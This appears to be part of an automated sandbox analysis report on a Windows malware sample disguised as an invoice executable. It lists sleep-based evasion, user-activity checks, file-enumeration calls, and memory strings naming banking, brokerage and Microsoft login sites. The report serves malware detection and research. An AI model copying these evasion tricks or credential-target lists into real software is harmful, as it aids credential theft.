Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599890 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599781 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599671 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599562 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599452 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599343 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599234 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599124 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599015 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598906 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598796 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598686 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598578 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598468 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598359 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598249 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598140 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598031 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597921 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597812 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597703 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597593 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597484 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597374 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597265 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597156 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597046 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596937 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596827 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596718 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596609 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596499 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596387 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596267 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596140 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596031 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595886 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595781 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595671 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595562 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595452 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595343 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595234 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595124 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595015 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594906 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594796 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594687 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594576 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6804 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2813 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7932 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep count: 33 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -30437127721620741s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -599890s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6840 Thread sleep count: 8894 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6840 Thread sleep count: 956 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -599781s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -599671s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -599562s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -599452s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -599343s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -599234s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -599124s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -599015s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -598906s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -598796s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -598686s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -598578s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -598468s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -598359s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -598249s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -598140s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -598031s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -597921s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -597812s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -597703s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -597593s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -597484s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -597374s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -597265s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -597156s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -597046s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -596937s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -596827s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -596718s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -596609s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -596499s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -596387s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -596267s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -596140s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -596031s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -595886s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -595781s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -595671s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -595562s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -595452s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -595343s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -595234s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -595124s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -595015s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -594906s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -594796s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -594687s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3572 Thread sleep time: -594576s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Code function: 0_2_00402868 FindFirstFileW, 0_2_00402868
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Code function: 0_2_004065FD FindFirstFileW,FindClose, 0_2_004065FD
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Code function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004059CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599890 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599781 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599671 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599562 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599452 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599343 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599234 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599124 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599015 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598906 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598796 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598686 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598578 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598468 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598359 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598249 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598140 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598031 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597921 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597812 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597703 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597593 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597484 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597374 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597265 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597156 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597046 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596937 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596827 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596718 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596609 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596499 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596387 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596267 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596140 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596031 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595886 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595781 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595671 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595562 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595452 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595343 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595234 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595124 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595015 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594906 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594796 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594687 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594576 Jump to behavior
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696494690
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: msiexec.exe, 00000007.00000002.2668131484.0000000008CB9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696494690
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696494690o
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696494690
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696494690f
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696494690s
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696494690o
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696494690j
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696494690s
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: msiexec.exe, 00000007.00000002.2668131484.0000000008C5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWpH
Source: msiexec.exe, 00000007.00000002.2684388544.00000000256EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696494690j
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696494690x
